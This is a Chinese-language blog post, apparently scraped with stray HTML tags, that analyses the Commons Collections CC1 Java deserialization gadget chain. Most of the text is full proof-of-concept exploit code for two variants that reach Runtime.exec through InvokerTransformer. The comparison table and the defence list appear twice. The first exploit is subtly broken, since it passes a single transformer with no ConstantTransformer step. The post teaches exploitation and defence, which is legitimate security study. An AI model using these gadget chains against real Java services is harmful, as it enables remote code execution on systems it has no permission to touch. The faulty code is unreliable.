Java反序列化CC1链分析（国内版与国外版）<\/h1>

环境配置<\/h2>

漏洞存在范围<\/strong>：JDK8U71以下的JDK版本<\/li>
依赖库<\/strong>：commons-collections-3.2.1<\/li>

测试JDK版本<\/strong>：JDK8u65<\/li> <\/ul>
基础概念<\/h2>
InvokerTransformer类分析<\/h3>
InvokerTransformer<\/code>类继承了Transformer<\/code>接口，关键代码如下：<\/p>
public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>input ==<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Class cls =<\/span> input.<\/span>getClass<\/span>();<\/span> <\/span><\/span> Method method =<\/span> cls.<\/span>getMethod<\/span>(<\/span>iMethodName,<\/span> iParamTypes);<\/span> <\/span><\/span> return<\/span> method.<\/span>invoke<\/span>(<\/span>input,<\/span> iArgs);<\/span> <\/span><\/span> }<\/span> catch<\/span> (...)<\/span> {<\/span> <\/span><\/span> ...<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>这是一个经典的反射调用执行方法，通过InvokerTransformer<\/code>的有参构造，然后调用transform<\/code>方法，可以构造任意命令执行。<\/p> CC1国内版分析<\/h2> 基本利用代码<\/h3> Runtime r =<\/span> Runtime.<\/span>getRuntime<\/span>();<\/span> <\/span><\/span>InvokerTransformer invokerTransformer =<\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>});<\/span> <\/span><\/span>invokerTransformer.<\/span>transform<\/span>(<\/span>r);<\/span> <\/span><\/span><\/code><\/pre>构造链分析<\/h3> 初始链<\/strong>：InvokerTransformer.transform()<\/code> → 任意命令执行<\/p> <\/li> 向上寻找调用链<\/strong>：<\/p> TransformedMap.checkSetValue()<\/code> 调用了transform<\/code>方法<\/li> AbstractInputCheckedMapDecorator.MapEntry.setValue()<\/code> 调用了checkSetValue<\/code><\/li> <\/ul> <\/li> 链子构造原理<\/strong>：<\/p> 使用TransformedMap.decorate()<\/code>构造valueTransformer<\/code>参数<\/li> 将InvokerTransformer<\/code>放入参数中<\/li> 当checkSetValue<\/code>调用时，会执行invokerTransformer.transform(value)<\/code><\/li> <\/ul> <\/li> 完整链<\/strong>：<\/p> AnnotationInvocationHandler.readObject() → TransformedMap.entrySet().iterator().next().setValue() → TransformedMap.checkSetValue() → InvokerTransformer.transform() <\/code><\/pre> <\/li> <\/ol> 最终EXP代码（国内版）<\/h3> import<\/span> org.apache.commons.collections.Transformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.functors.InvokerTransformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.map.TransformedMap;<\/span> <\/span><\/span> <\/span><\/span>import<\/span> java.io.*;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.Constructor;<\/span> <\/span><\/span>import<\/span> java.util.HashMap;<\/span> <\/span><\/span>import<\/span> java.util.Map;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> CC1Domestic<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 构造Transformer链 <\/span><\/span><\/span><\/span> Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span> <\/span><\/span> };<\/span> <\/span><\/span> <\/span><\/span> \/\/ 构造TransformedMap <\/span><\/span><\/span><\/span> Map innerMap =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span> innerMap.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span> "anything"<\/span>);<\/span> <\/span><\/span> Map outerMap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>innerMap,<\/span> null<\/span>,<\/span> transformers[<\/span>0<\/span>]);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 获取AnnotationInvocationHandler实例 <\/span><\/span><\/span><\/span> Class clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span> <\/span><\/span> Constructor construct =<\/span> clazz.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span> <\/span><\/span> construct.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> Object instance =<\/span> construct.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> outerMap);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 序列化与反序列化触发 <\/span><\/span><\/span><\/span> ByteArrayOutputStream barr =<\/span> new<\/span> ByteArrayOutputStream();<\/span> <\/span><\/span> ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>barr);<\/span> <\/span><\/span> oos.<\/span>writeObject<\/span>(<\/span>instance);<\/span> <\/span><\/span> oos.<\/span>close<\/span>();<\/span> <\/span><\/span> <\/span><\/span> ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> ByteArrayInputStream(<\/span>barr.<\/span>toByteArray<\/span>()));<\/span> <\/span><\/span> ois.<\/span>readObject<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>CC1国外版（LazyMap版）分析<\/h2> 与国内版的区别<\/h3> 从LazyMap<\/code>开始，调用链与国内版不同：<\/p> 关键方法<\/strong>：LazyMap.get()<\/code> 调用了transform<\/code>方法<\/li> 构造链<\/strong>： AnnotationInvocationHandler.readObject() → Proxy.entrySet().iterator().next() → AnnotationInvocationHandler.invoke() → LazyMap.get() → InvokerTransformer.transform() <\/code><\/pre> <\/li> <\/ol> 关键代码分析<\/h3> LazyMap利用<\/strong>：<\/li> <\/ol> Map innerMap =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span>Map lazyMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>innerMap,<\/span> transformerChain);<\/span> <\/span><\/span><\/code><\/pre> 动态代理<\/strong>：<\/li> <\/ol> \/\/ 创建代理对象 <\/span><\/span><\/span><\/span>Map proxyMap =<\/span> (<\/span>Map)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span> <\/span><\/span> Map.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Map.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> AnnotationInvocationHandler(<\/span>Target.<\/span>class<\/span>,<\/span> lazyMap)<\/span> <\/span><\/span>);<\/span> <\/span><\/span><\/code><\/pre>最终EXP代码（国外版）<\/h3> import<\/span> org.apache.commons.collections.Transformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.functors.ChainedTransformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.functors.ConstantTransformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.functors.InvokerTransformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.map.LazyMap;<\/span> <\/span><\/span> <\/span><\/span>import<\/span> java.io.*;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.Constructor;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.InvocationHandler;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.Proxy;<\/span> <\/span><\/span>import<\/span> java.util.HashMap;<\/span> <\/span><\/span>import<\/span> java.util.Map;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> CC1Foreign<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 构造Transformer链 <\/span><\/span><\/span><\/span> Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span> <\/span><\/span> };<\/span> <\/span><\/span> <\/span><\/span> Transformer transformerChain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 构造LazyMap <\/span><\/span><\/span><\/span> Map innerMap =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span> Map lazyMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>innerMap,<\/span> transformerChain);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 创建代理对象 <\/span><\/span><\/span><\/span> InvocationHandler handler =<\/span> (<\/span>InvocationHandler)<\/span> <\/span><\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>)<\/span> <\/span><\/span> .<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>)<\/span> <\/span><\/span> .<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> lazyMap);<\/span> <\/span><\/span> <\/span><\/span> Map proxyMap =<\/span> (<\/span>Map)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span> <\/span><\/span> Map.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Map.<\/span>class<\/span>},<\/span> <\/span><\/span> handler <\/span><\/span> );<\/span> <\/span><\/span> <\/span><\/span> \/\/ 创建最终触发对象 <\/span><\/span><\/span><\/span> Constructor constructor =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>)<\/span> <\/span><\/span> .<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span> <\/span><\/span> constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> Object instance =<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> proxyMap);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 序列化与反序列化触发 <\/span><\/span><\/span><\/span> ByteArrayOutputStream barr =<\/span> new<\/span> ByteArrayOutputStream();<\/span> <\/span><\/span> ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>barr);<\/span> <\/span><\/span> oos.<\/span>writeObject<\/span>(<\/span>instance);<\/span> <\/span><\/span> oos.<\/span>close<\/span>();<\/span> <\/span><\/span> <\/span><\/span> ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> ByteArrayInputStream(<\/span>barr.<\/span>toByteArray<\/span>()));<\/span> <\/span><\/span> ois.<\/span>readObject<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>总结对比<\/h2> 特性<\/th> 国内版 (TransformedMap)<\/th> 国外版 (LazyMap)<\/th> <\/tr> <\/thead> 起始点<\/td> AnnotationInvocationHandler.readObject()<\/td> AnnotationInvocationHandler.readObject()<\/td> <\/tr> 关键调用链<\/td> TransformedMap.setValue() → checkSetValue() → transform()<\/td> LazyMap.get() → transform()<\/td> <\/tr> 代理使用<\/td> 无<\/td> 使用动态代理<\/td> <\/tr> 复杂度<\/td> 相对简单<\/td> 相对复杂<\/td> <\/tr> 利用方式<\/td> 直接调用setValue<\/td> 通过代理调用get方法<\/td> <\/tr> <\/tbody> <\/table> 防御措施<\/h2> 升级JDK<\/strong>：升级到JDK8u71及以上版本<\/li> 安全配置<\/strong>：使用安全管理器限制反序列化<\/li> 使用白名单控制可反序列化的类<\/li> <\/ul> <\/li> 依赖管理<\/strong>：升级commons-collections到安全版本<\/li> 使用替代库如commons-collections4<\/li> <\/ul> <\/li> <\/ol>

特性<\/th>	国内版 (TransformedMap)<\/th>	国外版 (LazyMap)<\/th> <\/tr> <\/thead>
起始点<\/td>	AnnotationInvocationHandler.readObject()<\/td>	AnnotationInvocationHandler.readObject()<\/td> <\/tr>
关键调用链<\/td>	TransformedMap.setValue() → checkSetValue() → transform()<\/td>	LazyMap.get() → transform()<\/td> <\/tr>
代理使用<\/td>	无<\/td>	使用动态代理<\/td> <\/tr>
复杂度<\/td>	相对简单<\/td>	相对复杂<\/td> <\/tr>
利用方式<\/td>	直接调用setValue<\/td>	通过代理调用get方法<\/td> <\/tr> <\/tbody> <\/table> 防御措施<\/h2> 升级JDK<\/strong>：升级到JDK8u71及以上版本<\/li> 安全配置<\/strong>：使用安全管理器限制反序列化<\/li> 使用白名单控制可反序列化的类<\/li> <\/ul> <\/li> 依赖管理<\/strong>：升级commons-collections到安全版本<\/li> 使用替代库如commons-collections4<\/li> <\/ul> <\/li> <\/ol>